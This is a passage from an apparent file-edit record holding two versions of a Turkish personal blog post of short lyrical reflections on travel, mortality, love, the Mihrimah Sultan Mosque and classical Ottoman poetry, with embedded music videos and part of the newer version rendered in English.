trench; I could feel my feet touching the trench's other wall. A rifle, its stock at the tips of my feet, leaned against my shoulder.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nI have come to know a good person, and I say: if only I had met them sooner. And I load that \"if only\" with such feeling and such emphasis that it cannot bear the weight; it is crushed. A moon-faced one - her lovely manner shining like the moon - teaches how one becomes a connoisseur of beauties (bed\u00e2yi-\u00e2\u015fin\u00e2). How much of it I can learn, I do not know. Once more: *if only*... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa's hand touched my shoulder.\n\n_I am still amazed that I did not go mad with joy_ +\n_in the moments I heard from your tongue the words \"I loved you\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nThe moon is in the sky, shining; it is the fourteenth of the month. \n\n_There are words for you in my heart_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi, what do you say to this?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"I tell it all without ever speaking,_ +\n_the way wheat pours out what is inside it...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nA prayer falls into my heart from the tongue of Kays: +\n_\"Make the beauty of my beloved ever greater_ +\n_and make me, as it comes, ever more hopelessly devoted to her pain\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Why do you not speak in your own sentences?_ +\n-While this state veils my mind, how am I to speak? +\n-_Then why do you find yourself spokesmen and say it with their tongues?_ +\n-If my tongue spoke from my own heart, would this fire leave even a green leaf behind? +\n-_Then why do you not stay silent?_ +\n-While I converse without pause with my own inside, how am I to be silent? +\n-_Have you any proof that she knows?_ +\n-Is a moon a stranger to the heart its light falls upon? +\n-_Until when will you moan so?_ +\n-Can one become whole without slipping free of the existence of time? +\n-_What is it you wait for?_ +\n-What is the moth to do before the candle is lit? What I wait for is a light from her candle.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nO reason that will not let me sleep, how beautiful you are! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nO Karacao\u011flan, my state is there for all to see; will it still not wake her? 
+\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. 
G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUtana s\u0131k\u0131la, incitmekten korkarak...\n\nvideo::245933662[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n","old_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nBir s\u00fcredir haftada bir yapt\u0131\u011f\u0131m yolculuklarda fark\u0131na vard\u0131m ki her yolculuk bana \u00f6l\u00fcm\u00fc ciddi anlamda hat\u0131rlat\u0131yor. G\u00fcnl\u00fck ya\u015fant\u0131da mezarl\u0131k duvarlar\u0131n\u0131n arkas\u0131na silkeledi\u011fim(iz) bu ger\u00e7e\u011fi hat\u0131rlamama vesile oluyor yolculuklar. 
Her yolculuk bunu az veya \u00e7ok bir \u015fekilde y\u00e2d\u0131ma d\u00fc\u015f\u00fcr\u00fcyormu\u015f asl\u0131nda yeni farkettim. Neden sorusu bu sezi\u015fin pe\u015fine tak\u0131ld\u0131 hemencecik. \u0130lk akl\u0131ma gelen cevap \u015fu oldu: \"\u00d6l\u00fcm de bir yolculuktur neticede. Bu k\u0131sa yolculuklar o b\u00fcy\u00fck yolculu\u011fun bir musaggaras\u0131d\u0131r.\" Bir de \u015f\u00f6yle tartt\u0131m kendimi: \"Yoksa geri d\u00f6nememek korkusu mu bu ya\u015fad\u0131\u011f\u0131n?\", \"\u00d6l\u00fcm\u00fc de geri d\u00f6n\u00fc\u015f\u00fc olmayan bir gidi\u015f olarak g\u00f6r\u00fcyorsun da D\u00fcnya'ya d\u00fc\u015fk\u00fcnl\u00fc\u011f\u00fcn m\u00fc akl\u0131na getiriyor onu?\" Terazinin iki kefesine iki d\u00fc\u015f\u00fcnceyi de b\u0131rakt\u0131m, tahterevallide oynayan \u00e7ocuklar gibi hangileri a\u015fa\u011f\u0131da hangileri yukar\u0131da g\u00f6remedim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu yolculuklar\u0131n bitiminde kendimi bir arkada\u015f\u0131n kuca\u011f\u0131na b\u0131rak\u0131verdim. Birka\u00e7 ayd\u0131r uzak kald\u0131\u011f\u0131m, avlusunda kedilerin ko\u015fturmacas\u0131na dald\u0131\u011f\u0131m \u00dcsk\u00fcdar Mihrimah Sultan Cami\u00ee'nden ba\u015fka bir yer de\u011fildi. Her seferinde uzaktan g\u00fcl-endam\u0131n\u0131 seyredip biraz \u00f6zlem biraz sevin\u00e7le yol al\u0131yorum ona do\u011fru. Gece en siyah \u00e7ar\u015faf\u0131 \u00f6rterken g\u00f6ky\u00fcz\u00fcne avlusuna ayak bas\u0131yorum, Valide Sultan Cami\u00ee ile s\u00f6yle\u015fmeye ba\u015fl\u0131yor iki dost. B\u00f6lm\u00fcyorum onlar\u0131, dinliyorum bir yandan \u015fad\u0131rvandan akan sular\u0131n sesi. G\u00fcne\u015f utanga\u00e7l\u0131\u011f\u0131n\u0131 k\u0131z\u0131ll\u0131klar\u0131n ard\u0131nda b\u0131rakarak g\u00f6steriyor kendini. Bir ba\u015fka dostu g\u00f6r\u00fcyorum, uzak kalman\u0131n \u0131rak edemedi\u011fi bir dostu. Sonra diyorum: \"Dostu g\u00f6rmek, bayramd\u0131r.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYolculuk, okul, i\u015f derken bir yo\u011funluk kapl\u0131yor d\u00f6rt yan\u0131m\u0131. Yapaca\u011f\u0131m i\u015flerin, g\u00f6revlerin vs. zihnimi me\u015fgul etmesi san\u0131r\u0131m daha yorucu oluyor. Bu yo\u011funluk i\u00e7erisinde bir yaz\u0131y\u0131 okumak i\u00e7in zaman kollamaya \u00e7al\u0131\u015f\u0131yordum, bir t\u00fcrl\u00fc nasip olmuyordu. Okudu\u011fum zaman normalde alamayaca\u011f\u0131m bir keyfi ald\u0131m. San\u0131r\u0131m okumak i\u00e7in g\u00f6sterdi\u011fim i\u015ftiyak kitapla\/yaz\u0131yla aramda bir ba\u011f olu\u015fmas\u0131na vesile oluyor. Ayn\u0131 durum ruhen, zihnen yo\u011fun oldu\u011fum veya kendimi yaln\u0131z hissetti\u011fim -y\u0131llard\u0131r tek ya\u015famama ra\u011fmen yaln\u0131z hissetti\u011fim zamanlar, kalabal\u0131klar i\u00e7indeki yaln\u0131zl\u0131\u011f\u0131mdan az- anlarda yine ortaya \u00e7\u0131k\u0131yor. Roman\u0131n bir kahraman\u0131 omzuma dokunuyor, bir di\u011feri elini uzat\u0131yor, \u00f6b\u00fcr\u00fc g\u00fcl\u00fcms\u00fcyor. 
Buna en iyi \u00f6rnek _Nisan'\u0131n 2 G\u00fcn\u00fc_, basit ve yal\u0131n bir anlat\u0131m\u0131 olsa da i\u00e7inde yer buldu\u011fum bir romand\u0131. Birka\u00e7 y\u0131l \u00f6nce okul k\u00fct\u00fcphanesinde denk gelip \u00f6d\u00fcn\u00e7 alm\u0131\u015ft\u0131m. Bir k\u0131\u015f g\u00fcn\u00fc s\u0131rt\u0131m\u0131 pete\u011fe dayay\u0131p okudu\u011fumu hat\u0131rl\u0131yorum. Petek siperin bir cephesi olmu\u015ftu, ayaklar\u0131m\u0131n siperin di\u011fer cephesine de\u011fdi\u011fini hissediyordum. Kabzas\u0131 ayaklar\u0131m\u0131n ucunda bir t\u00fcfek omzuma yaslanm\u0131\u015ft\u0131.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi insan tan\u0131yorum, ke\u015fke daha \u00f6nce tan\u0131sayd\u0131m diyorum. Ve ke\u015fkeye \u00f6yle bir duygu ve vurgu y\u00fckl\u00fcyorum ki takat getiremiyor, eziliyor. Bir mahr\u00fb -g\u00fczel tavr\u0131 ay gibi parl\u0131yor- bed\u00e2yi-\u00e2\u015fin\u00e2 (bed\u00e2yi-\u015finas) nas\u0131l olunur \u00f6\u011fretiyor. Ben ne kadar \u00f6\u011frenebilirim bilmiyorum. Bir daha *ke\u015fke*... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa'n\u0131n eli omzuma dokundu.\n\n_Nas\u0131l \u00e7\u0131ld\u0131rmad\u0131m hayretdeyim h\u00e2l\u00e2 sevincimden_ +\n_Lis\u00e2n\u0131ndan seni sevdim s\u00f6z\u00fcn g\u00fb\u015f itdi\u011fim demler_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6kte ay, parl\u0131yor; ay\u0131n on d\u00f6rd\u00fcd\u00fcr. 
\n\n_Sana vard\u0131r y\u00fcre\u011fimde s\u00f6zlerim_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi ne dersin b\u00f6yle?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Anlat\u0131yorum, hi\u00e7 konu\u015fmadan,_ +\n_Bu\u011fday\u0131n i\u00e7ini d\u00f6kmesi gibi...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir dua, Kays'\u0131n dilinden g\u00f6nl\u00fcme d\u00fc\u015fer: +\n_\"Gittik\u00e7e h\u00fcsn\u00fcn eyle ziy\u00e2de nig\u00e2r\u0131m\u0131n_ +\n_Geldik\u00e7e derdine beter et m\u00fcptel\u00e2 beni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Neden kendi c\u00fcmlelerinle konu\u015fmazs\u0131n?_ +\n-Bu h\u00e2l, akl\u0131m\u0131 setr ederken ben nas\u0131l konu\u015fay\u0131m? +\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ +\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? 
+\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. 
